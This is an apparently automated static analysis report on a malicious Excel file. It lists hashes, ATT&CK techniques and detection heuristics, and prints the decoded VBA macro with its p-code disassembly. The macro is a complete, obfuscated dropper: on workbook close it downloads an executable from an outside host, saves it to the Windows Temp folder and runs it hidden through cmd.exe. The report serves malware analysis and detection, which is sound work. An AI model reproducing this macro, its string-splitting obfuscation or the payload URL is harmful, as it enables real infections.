Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 98917be41e446698…

MALICIOUS

Office (OLE)

Size: 510.5 KB
Created: 2020-07-03 08:10:55
Authoring application: Microsoft Excel
First seen: 2020-09-07
MD5: 4775ebd5e313c8977865c0aa0358f79b
SHA-1: 8bffb3644513b8548f2e107ad8d2707deda65f1d
SHA-256: 98917be41e446698aaf1dcb464bfc27ca686c56e2636e2801e6e8c46929e5f71
Risk Score: 262

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The VBA macro within the Excel file is designed to download a file from 'https://office-files.pw/Dd1239fghH/f.exe' and save it as 'C:\Windows\Temp\d.exe'. It then attempts to execute this downloaded file using 'cmd.exe' via the Win32_Process WMI object. The obfuscation techniques used, such as string concatenation for API names and URLs, indicate a deliberate attempt to evade detection.

Heuristics 7

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    output.write request.responseBody
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    Set request = CreateObject("Mi" + q + "LHT" + "TP")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set request = CreateObject("Mi" + q + "LHT" + "TP")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set process = GetObject("wi" + "nmgm" + "ts" + ":" + "W" + "in3" + "2" + "_" + "Pr" + "oce" + "ss")
  • Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URL
    A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://office-files.pw/Dd1239fghH/f.exe Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5285 bytes
SHA-256: 1ef8ae385ecc4ef8fe505ab9cf19721da4e6ac83ef8776c70a291b81552667bc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
On Error Resume Next
Dim request
Dim q As String
q = "croso" + "ft.XM"
Set request = CreateObject("Mi" + q + "LHT" + "TP")
Dim t1 As String
t1 = "t"
Dim ff As String
ff = "pw/Dd1239fghH/f.e" + "xe"
request.Open "GET", "h" + "t" + "t" + "ps" + ":" + "/" + "/office" + "-files." + ff, False
request.Send
Dim sss As String
sss = "b" + "." + "Stream"
Set output = CreateObject("Ad" + "od" + sss)
Dim filename As String
filename = "C" + ":" + "\Wi" + "ndo" + "ws" + "\Te" + "mp\d" + "." + "exe"
output.Type = 1
output.Open
output.write request.responseBody
output.savetofile filename, 2
Set process = GetObject("wi" + "nmgm" + "ts" + ":" + "W" + "in3" + "2" + "_" + "Pr" + "oce" + "ss")
Dim path As String
path = "C" + ":" + "\Wi" + "ndo" + "ws" + "\Te" + "mp\"
Dim p1 As String
p1 = "/h" + "id"
Dim p2 As String
p2 = "/c " + "cd"
Result = process.Create("cm" + "d.e" + "xe " + p1 + " " + p2 + " " + path + " & " + " st" + "art d.e" + "xe", Null, Null, processid)
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /tmp/qstore_gkgc70d0
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 3256 bytes
' Line #0:
' 	FuncDefn (Sub Workbook_BeforeClose(Cancel As Boolean))
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Dim 
' 	VarDefn request
' Line #3:
' 	Dim 
' 	VarDefn q (As String)
' Line #4:
' 	LitStr 0x0005 "croso"
' 	LitStr 0x0005 "ft.XM"
' 	Add 
' 	St q 
' Line #5:
' 	SetStmt 
' 	LitStr 0x0002 "Mi"
' 	Ld q 
' 	Add 
' 	LitStr 0x0003 "LHT"
' 	Add 
' 	LitStr 0x0002 "TP"
' 	Add 
' 	ArgsLd CreateObject 0x0001 
' 	Set request 
' Line #6:
' 	Dim 
' 	VarDefn t1 (As String)
' Line #7:
' 	LitStr 0x0001 "t"
' 	St t1 
' Line #8:
' 	Dim 
' 	VarDefn ff (As String)
' Line #9:
' 	LitStr 0x0011 "pw/Dd1239fghH/f.e"
' 	LitStr 0x0002 "xe"
' 	Add 
' 	St ff 
' Line #10:
' 	LitStr 0x0003 "GET"
' 	LitStr 0x0001 "h"
' 	LitStr 0x0001 "t"
' 	Add 
' 	LitStr 0x0001 "t"
' 	Add 
' 	LitStr 0x0002 "ps"
' 	Add 
' 	LitStr 0x0001 ":"
' 	Add 
' 	LitStr 0x0001 "/"
' 	Add 
' 	LitStr 0x0007 "/office"
' 	Add 
' 	LitStr 0x0007 "-files."
' 	Add 
' 	Ld ff 
' 	Add 
' 	LitVarSpecial (False)
' 	Ld request 
' 	ArgsMemCall Open 0x0003 
' Line #11:
' 	Ld request 
' 	ArgsMemCall Send 0x0000 
' Line #12:
' 	Dim 
' 	VarDefn sss (As String)
' Line #13:
' 	LitStr 0x0001 "b"
' 	LitStr 0x0001 "."
' 	Add 
' 	LitStr 0x0006 "Stream"
' 	Add 
' 	St sss 
' Line #14:
' 	SetStmt 
' 	LitStr 0x0002 "Ad"
' 	LitStr 0x0002 "od"
' 	Add 
' 	Ld sss 
' 	Add 
' 	ArgsLd CreateObject 0x0001 
' 	Set Output 
' Line #15:
' 	Dim 
' 	VarDefn filename (As String)
' Line #16:
' 	LitStr 0x0001 "C"
' 	LitStr 0x0001 ":"
' 	Add 
' 	LitStr 0x0003 "\Wi"
' 	Add 
' 	LitStr 0x0003 "ndo"
' 	Add 
' 	LitStr 0x0002 "ws"
' 	Add 
' 	LitStr 0x0003 "\Te"
' 	Add 
' 	LitStr 0x0004 "mp\d"
' 	Add 
' 	LitStr 0x0001 "."
' 	Add 
' 	LitStr 0x0003 "exe"
' 	Add 
' 	St filename 
' Line #17:
' 	LitDI2 0x0001 
' 	Ld Output 
' 	MemSt Type 
' Line #18:
' 	Ld Output 
' 	ArgsMemCall Open 0x0000 
' Line #19:
' 	Ld request 
' 	MemLd responseBody 
' 	Ld Output 
' 	ArgsMemCall Write 0x0001 
' Line #20:
' 	Ld filename 
' 	LitDI2 0x0002 
' 	Ld Output 
' 	ArgsMemCall savetofile 0x0002 
' Line #21:
' 	SetStmt 
' 	LitStr 0x0002 "wi"
' 	LitStr 0x0004 "nmgm"
' 	Add 
' 	LitStr 0x0002 "ts"
' 	Add 
' 	LitStr 0x0001 ":"
' 	Add 
' 	LitStr 0x0001 "W"
' 	Add 
' 	LitStr 0x0003 "in3"
' 	Add 
' 	LitStr 0x0001 "2"
' 	Add 
' 	LitStr 0x0001 "_"
' 	Add 
' 	LitStr 0x0002 "Pr"
' 	Add 
' 	LitStr 0x0003 "oce"
' 	Add 
' 	LitStr 0x0002 "ss"
' 	Add 
' 	ArgsLd GetObject 0x0001 
' 	Set process 
' Line #22:
' 	Dim 
' 	VarDefn path (As String)
' Line #23:
' 	LitStr 0x0001 "C"
' 	LitStr 0x0001 ":"
' 	Add 
' 	LitStr 0x0003 "\Wi"
' 	Add 
' 	LitStr 0x0003 "ndo"
' 	Add 
' 	LitStr 0x0002 "ws"
' 	Add 
' 	LitStr 0x0003 "\Te"
' 	Add 
' 	LitStr 0x0003 "mp\"
' 	Add 
' 	St path 
' Line #24:
' 	Dim 
' 	VarDefn p1 (As String)
' Line #25:
' 	LitStr 0x0002 "/h"
' 	LitStr 0x0002 "id"
' 	Add 
' 	St p1 
' Line #26:
' 	Dim 
' 	VarDefn p2 (As String)
' Line #27:
' 	LitStr 0x0003 "/c "
' 	LitStr 0x0002 "cd"
' 	Add 
' 	St p2 
' Line #28:
' 	LitStr 0x0002 "cm"
' 	LitStr 0x0003 "d.e"
' 	Add 
' 	LitStr 0x0003 "xe "
' 	Add 
' 	Ld p1 
' 	Add 
' 	LitStr 0x0001 " "
' 	Add 
' 	Ld p2 
' 	Add 
' 	LitStr 0x0001 " "
' 	Add 
' 	Ld path 
' 	Add 
' 	LitStr 0x0003 " & "
' 	Add 
' 	LitStr 0x0003 " st"
' 	Add 
' 	LitStr 0x0007 "art d.e"
' 	Add 
' 	LitStr 0x0002 "xe"
' 	Add 
' 	LitVarSpecial (Null)
' 	LitVarSpecial (Null)
' 	Ld processid 
' 	Ld process 
' 	ArgsMemLd Create 0x0004 
' 	St Result 
' Line #29:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/Sheet1 - 991 bytes